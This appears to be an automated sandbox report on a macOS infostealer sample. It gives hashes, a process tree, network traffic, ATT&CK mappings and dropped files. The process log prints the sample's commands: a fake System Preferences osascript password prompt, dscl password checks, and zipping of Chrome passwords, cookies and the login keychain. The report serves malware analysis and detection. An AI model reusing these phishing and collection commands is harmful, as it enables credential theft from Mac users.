7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f

Analysis

max time kernel
225s
max time network
221s
platform
macos-10.15_amd64
resource
macos-20231201-en
resource tags

arch:amd64arch:i386image:macos-20231201-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
16/01/2024, 00:15 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f
Size

377KB
MD5

161f53fb4323c0ded595223ee11ce061
SHA1

e95b90c253794f56d32b14b2849f329d3c50f122
SHA256

7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f
SHA512

d2db5a47e032f13a2aaee60fedeb2894e73adf6017db5f4cff34567689ecd19b889b51273fca7465ae48613d4f1a5ba3d0160ed634f4705638dc806ae511219e
SSDEEP

6144:roQ99P3TsQFH6+lIrA53DS3FOhNxnjkv6xAmwxG5QM+yuh7xAJjsD5QM+yuh:rtDbsQFH0rsNxqxxos

Score

7^/10

evasion

Malware Config

Signatures

System Checks 1 TTPs 2 IoCs

evasion

System Checks

T1497.001

ioc	Process
sh -c "system_profiler SPHardwareDataType"	Process not Found
system_profiler SPHardwareDataType	Process not Found

/usr/sbin/spctl
/usr/sbin/spctl --status
1⤵
PID:517

/usr/sbin/spctl
/usr/sbin/spctl --test-devid-status
1⤵
PID:518

/usr/bin/syslog
/usr/bin/syslog -s -k com.apple.message.domain com.apple.security.assessment.current_state com.apple.message.signature "assessments enabled" com.apple.message.signature2 "devid enabled" Message "Gatekeeper state assessments enabled/devid enabled"
1⤵
PID:519

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f\""
1⤵
PID:520

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f\""
1⤵
PID:520

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f\""
1⤵
PID:520

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f
1⤵
PID:520

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f
1⤵
PID:520
- /bin/zsh
  /bin/zsh -c /Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f
  2⤵
  PID:521
- /bin/zsh
  /bin/zsh -c /Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f
  2⤵
  PID:521
- /Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f
  /Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f
  2⤵
  PID:521
- /Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f
  /Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f
  2⤵
  PID:521

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.systemsoundserverd
1⤵
PID:525

/usr/sbin/systemsoundserverd
/usr/sbin/systemsoundserverd
1⤵
PID:525

/usr/libexec/xpcproxy
xpcproxy com.apple.pbs
1⤵
PID:526

/System/Library/CoreServices/pbs
/System/Library/CoreServices/pbs
1⤵
PID:526

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.AudioComponentRegistrar
1⤵
PID:527

/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon
1⤵
PID:527

/usr/libexec/xpcproxy
xpcproxy "com.apple.xpc.launchd.oneshot.0x10000002.Problem Reporter"
1⤵
PID:548

/System/Library/CoreServices/Problem Reporter.app/Contents/MacOS/Problem Reporter
"/System/Library/CoreServices/Problem Reporter.app/Contents/MacOS/Problem Reporter" -psn_0_172074
1⤵
PID:548

/usr/libexec/xpcproxy
xpcproxy com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:549

/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:549

/usr/libexec/xpcproxy
xpcproxy com.apple.xpc.launchd.oneshot.0x10000003.7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f
1⤵
PID:566

/Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f
/Users/run/7668dcab16c2f16396dd0d3a580bca89a3675462c1e9f98e79d75d6e7e6c8c1f -psn_0_176171
1⤵
PID:566

/usr/libexec/xpcproxy
xpcproxy com.apple.metadata.mdwrite
1⤵
PID:567

/bin/sh
sh -c "dscl /Local/Default -authonly run \"\""
1⤵
PID:568

/bin/bash
sh -c "dscl /Local/Default -authonly run \"\""
1⤵
PID:568

/bin/bash
sh -c "dscl /Local/Default -authonly run \"\""
1⤵
PID:568

/usr/bin/dscl
dscl /Local/Default -authonly run
1⤵
PID:568

/usr/bin/dscl
dscl /Local/Default -authonly run
1⤵
PID:568

/usr/libexec/xpcproxy
xpcproxy com.apple.AccountPolicyHelper
1⤵
PID:569

/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
1⤵
PID:569

/bin/sh
sh -c "osascript -e 'display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:570

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:570

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:570

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:570

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:570

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:573

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:573

/bin/sh
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:576

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:576

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:576

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:576

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:576

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump
1⤵
PID:578

/usr/sbin/spindump
/usr/sbin/spindump
1⤵
PID:578

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump_agent
1⤵
PID:579

/usr/libexec/spindump_agent
/usr/libexec/spindump_agent
1⤵
PID:579

/bin/sh
sh -c "dscl /Local/Default -authonly run 34"
1⤵
PID:580

/bin/bash
sh -c "dscl /Local/Default -authonly run 34"
1⤵
PID:580

/bin/bash
sh -c "dscl /Local/Default -authonly run 34"
1⤵
PID:580

/usr/bin/dscl
dscl /Local/Default -authonly run 34
1⤵
PID:580

/usr/bin/dscl
dscl /Local/Default -authonly run 34
1⤵
PID:580

/bin/sh
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:581

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:581

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:581

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:581

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:581

/usr/bin/bzip2
/usr/bin/bzip2 -f /var/log/wifi.log.0
1⤵
PID:583

/bin/sh
sh -c "dscl /Local/Default -authonly run 1234"
1⤵
PID:584

/bin/bash
sh -c "dscl /Local/Default -authonly run 1234"
1⤵
PID:584

/bin/bash
sh -c "dscl /Local/Default -authonly run 1234"
1⤵
PID:584

/usr/bin/dscl
dscl /Local/Default -authonly run 1234
1⤵
PID:584

/usr/bin/dscl
dscl /Local/Default -authonly run 1234
1⤵
PID:584

/bin/sh
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:585

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:585

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:585

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:585

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:585

/bin/sh
sh -c "dscl /Local/Default -authonly run 1234"
1⤵
PID:589

/bin/bash
sh -c "dscl /Local/Default -authonly run 1234"
1⤵
PID:589

/bin/bash
sh -c "dscl /Local/Default -authonly run 1234"
1⤵
PID:589

/usr/bin/dscl
dscl /Local/Default -authonly run 1234
1⤵
PID:589

/usr/bin/dscl
dscl /Local/Default -authonly run 1234
1⤵
PID:589

/bin/sh
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:590

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:590

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:590

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:590

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:590

/bin/sh
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:601

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:601

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:601

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:601

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:601

/usr/libexec/xpcproxy
xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E
1⤵
PID:605

/bin/sh
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:606

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:606

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:606

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:606

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:606

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
1⤵
PID:605

/bin/sh
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:607

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:607

/bin/bash
sh -c "osascript -e 'display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'"
1⤵
PID:607

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:607

/usr/bin/osascript
osascript -e "display dialog \"macOS needs to access System settings You entered invalid password. Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬"
1⤵
PID:607

/bin/sh
sh -c "dscl /Local/Default -authonly run root"
1⤵
PID:608

/bin/bash
sh -c "dscl /Local/Default -authonly run root"
1⤵
PID:608

/bin/bash
sh -c "dscl /Local/Default -authonly run root"
1⤵
PID:608

/usr/bin/dscl
dscl /Local/Default -authonly run root
1⤵
PID:608

/usr/bin/dscl
dscl /Local/Default -authonly run root
1⤵
PID:608

/bin/sh
sh -c "system_profiler SPHardwareDataType"
1⤵
PID:609

/bin/bash
sh -c "system_profiler SPHardwareDataType"
1⤵
PID:609

/bin/bash
sh -c "system_profiler SPHardwareDataType"
1⤵
PID:609

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:609

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
1⤵
PID:609

/bin/sh
sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/75511123 /Users/run/75511123.zip --norsrc --noextattr"
1⤵
PID:611

/bin/bash
sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/75511123 /Users/run/75511123.zip --norsrc --noextattr"
1⤵
PID:611

/bin/bash
sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/75511123 /Users/run/75511123.zip --norsrc --noextattr"
1⤵
PID:611

/usr/bin/ditto
ditto -c -k --sequesterRsrc --keepParent /Users/run/75511123 /Users/run/75511123.zip --norsrc --noextattr
1⤵
PID:611

/usr/bin/ditto
ditto -c -k --sequesterRsrc --keepParent /Users/run/75511123 /Users/run/75511123.zip --norsrc --noextattr
1⤵
PID:611

Network

DNS

mobile.events.data.trafficmanager.net

Remote address:

8.8.8.8:53

Request

mobile.events.data.trafficmanager.net

IN A

Response

mobile.events.data.trafficmanager.net

IN CNAME

onedscolprdeus16.eastus.cloudapp.azure.com

onedscolprdeus16.eastus.cloudapp.azure.com

IN A

52.168.117.171
DNS

e673.dsce9.akamaiedge.net

Remote address:

8.8.8.8:53

Request

e673.dsce9.akamaiedge.net

IN A

Response

e673.dsce9.akamaiedge.net

IN A

95.100.244.21
DNS

cds.apple.com

Remote address:

8.8.8.8:53

Request

cds.apple.com

IN A

Response

cds.apple.com

IN CNAME

cds-cdn.v.aaplimg.com

cds-cdn.v.aaplimg.com

IN A

82.78.25.240
DNS

help.apple.com

Remote address:

8.8.8.8:53

Request

help.apple.com

IN A

Response

help.apple.com

IN CNAME

help.origin-apple.com.akadns.net

help.origin-apple.com.akadns.net

IN CNAME

help-ar.apple.com.edgekey.net

help-ar.apple.com.edgekey.net

IN CNAME

e11408.d.akamaiedge.net

e11408.d.akamaiedge.net

IN A

95.100.245.89

52.182.143.211:443

tls, https

1.8kB
16
17.248.236.67:443

tls, https

128 B
40 B
2
1
52.182.143.211:443

mobile.pipe.aria.microsoft.com

tls

19.8kB
9.1kB
48
33
17.137.170.36:443

tls

83 B
40 B
1
1
17.171.98.2:443

tls

301 B
40 B
4
1
82.78.25.240:443

cds.apple.com

tls

65.2kB
1.0MB
877
817
95.100.245.89:443

help.apple.com

tls

30.2kB
113.0kB
171
130
95.100.245.89:443

help.apple.com

tls

2.3kB
6.8kB
17
16
185.106.93.154:80

688 B
11

8.8.8.8:53

mobile.events.data.trafficmanager.net

dns

83 B
155 B
1
1

DNS Request

mobile.events.data.trafficmanager.net

DNS Response

52.168.117.171
8.8.8.8:53

e673.dsce9.akamaiedge.net

dns

71 B
87 B
1
1

DNS Request

e673.dsce9.akamaiedge.net

DNS Response

95.100.244.21
8.8.8.8:53

cds.apple.com

dns

59 B
107 B
1
1

DNS Request

cds.apple.com

DNS Response

82.78.25.240
8.8.8.8:53

help.apple.com

dns

60 B
196 B
1
1

DNS Request

help.apple.com

DNS Response

95.100.245.89
224.0.0.251:5353

332 B
1

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/Users/run/75511123.zip

Filesize
36KB

MD5
eac24e79a4dc47cbb6e7fde410fa3cb0

SHA1
f8367a103881239bb20ff623a8a4cebf6dfba98b

SHA256
a8cdcded59827e1cbe55158d8ae4f6840efeb59bf728900448a4351cd4645f94

SHA512
9207cab7d3cea12ede3fba2dfed4715e131c67d47bd36f13ce05b46a25b168b5d137697add7b44342972de1e996cefec4682585d0836c3eb7096c5f07367190b

Download Submit
/Users/run/75511123/Chromium/Chrome/Autofill0

Filesize
90KB

MD5
4e9060f76c1cb5b54005dc6640a58f0d

SHA1
04a1e6791ae55612d9b63f23ccb37eec398b3d27

SHA256
5b6dd3116e1d3ecbf6d07ecfc03f1537ab00ce91336cc7c6cddda6df0c9984d3

SHA512
be921e02bb810fb867c1de3e3c2a9c3b04c84188d6a9eae60b73558bd4748c1451161da8fba2c8e74f225be4b8a6f0e98276fe1e397b0083fcbbd4ebdf32e148

Download Submit
/Users/run/75511123/Chromium/Chrome/Cookies2

Filesize
20KB

MD5
2a3fa78b5f55b529a2698ad187c80204

SHA1
cbbda35512038de511ac23b0aed12e9e86bcc796

SHA256
d52ad17cc5096119732f06311ef2e25005c2a00f551c9684e2d655cbc846455b

SHA512
e9b113ec0c6a888e059cf625b0bfb128d11a55970fed12df30848c9f836c5f36b2660abb4e2a820e7dedd6f0ead312edec1c6cd645f14091d98b42f696bda9ab

Download Submit
/Users/run/75511123/Chromium/Chrome/Password1

Filesize
40KB

MD5
b6914d8e5cb470236eceed8d6f8b4fb7

SHA1
cdff8880e9fa7630fc8d57af4669365b5ab29b60

SHA256
45bda2415419c24d2526ae60cae5ee1d66bc8d2cc986bb9e94c0f3c414af06c1

SHA512
1c491cfeb2b883ed20a43e16d7bf620520f4b770c8727ffb83e02554aa6aa54def4732460bcff82014050f7a1fba38e01f5570cacfbfcef6da6f2f795dc56ee7

Download Submit
/Users/run/75511123/Sysinfo.txt

Filesize
563B

MD5
145b54e263153d86208ad060b646345f

SHA1
00b8a8a2ab393174724eb82482d6bbccc24ed3e4

SHA256
193274e10a236730a2ec1cce83d25d3959791923282367b0abaf36b2365138a5

SHA512
d0db24a56ce0aafe8ffdfd7976a4c11c6ce83e5f5a33fa2518f8443299e87886e6e2411736fd221c56b6100d31b5c5d0c07fb0098ec39d4405cad42048262c54

Download Submit
/Users/run/75511123/login-keychain

Filesize
102KB

MD5
43ad4600f77b967c815c0f3d04e6272f

SHA1
bc01eb097cb4d47d695ff8dddd9910bf20647a7b

SHA256
3c6925e85347dd2e5ea5d3112757f35fecd0db5a8cc10ef6936bba253923c10a

SHA512
18037caf90f21c6ea0bb38a74e55aa2fa624c55822e0fe7709ae32c4cc71b35ad67db5cc797b6cecd139ddc1de145cfd7876e14937406338c30d56d0ab4df87f

Download Submit
/Users/run/75511123/password-entered

Filesize
4B

MD5
63a9f0ea7bb98050796b649e85481845

SHA1
dc76e9f0c0006e8f919e0c515c66dbba3982f785

SHA256
4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2

SHA512
99adc231b045331e514a516b4b7680f588e3823213abe901738bc3ad67b2f6fcb3c64efb93d18002588d3ccc1a49efbae1ce20cb43df36b38651f11fa75678e8

Download Submit
/Users/run/Library/Caches/.dat.nosync020e.eXyQaX

Filesize
12KB

MD5
0da206b44aee1e47a99246b7a2cb14c6

SHA1
61f8e0d9ff813a4f2eba5aa85989bf78b68fd48f

SHA256
ee61a7325c2a76661ac689da5a14155fd173370929e9875825f5740a049cfe77

SHA512
90dac241e2ca636cf97ab8a83f2314721ecf863bc14cbbdb73169f1e4869f85f6ff90334ee7e2fc10bd89be0c5e7faab804adf37a1ac070c7566d21cf027a84c

Download Submit
/Users/run/Library/Saved Application State/com.apple.osascript.savedState/data.data

Filesize
1KB

MD5
36f106df8cf28c712f0527f336dd36b5

SHA1
c089e9825f9be00ebc449aebdedfa545cca0fee2

SHA256
bd83e4e5032982b211cd453d3547edf0156326c0604a1a2af4e1ac3c9ecd98e2

SHA512
0de9e7aa4ada2b87a3ed37e4b174d767e98d905e59dfb4f90bb4a9647e823188bf33c7b3701cb997ceb86a753c62dbf4aa37601eef98855d91221afd173fed14

Download Submit
/Users/run/Library/Saved Application State/com.apple.osascript.savedState/data.data

Filesize
1KB

MD5
3d99d501823d313ba312a7ac75404fef

SHA1
8db7d2c1d632be5a74ffa6dce33567e1366639a2

SHA256
edb6e574819f9c2d5df25cf805f6b5bbec5188d56c754b8801d5b4bc4274f710

SHA512
7b790aec123177a87d4dfcbf205f4011db2fcc41f4839a06a7c3c3e6c2071b8dfcc5c23a6301661a99294df69ec1c8a267856a96b1610f3cdce90661e4a1183d

Download Submit
/Users/run/Library/Saved Application State/com.apple.osascript.savedState/data.data

Filesize
1KB

MD5
e9c10b1861c43c4278248905921d155b

SHA1
74c87b54533ebadca7d2216aedb22cc729be266d

SHA256
cd36dee23a60e19605da333928e7cec12fb51ed4ac085813fb437aa16c6e20d8

SHA512
1f61b99a980673f5fb96c2c040e5d956dbab4601a64149f68a0c233d411d887c49a67fd79a1176e10ca3d391005e792f681a1f847b3a00b941dde3c10421c9c0

Download Submit
/private/var/log/wifi.log.0.bz2

Filesize
647B

MD5
b8f6860e22e11db7474d13a27559c121

SHA1
a3e140c79746ab5fa81171218264b097039a50f5

SHA256
6ae6126d5edb94c919daf7c02166013e3a54a41abf1daa1a8734702d7933d726

SHA512
d16d8786dac6bb4548fd8aaf8369b79492136a19b61d4e065f5e7eb84214fca81a8ac5cbad1e345b707993c76d71c2af8c19cdbe269443a779e640dbdd4fc233

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response
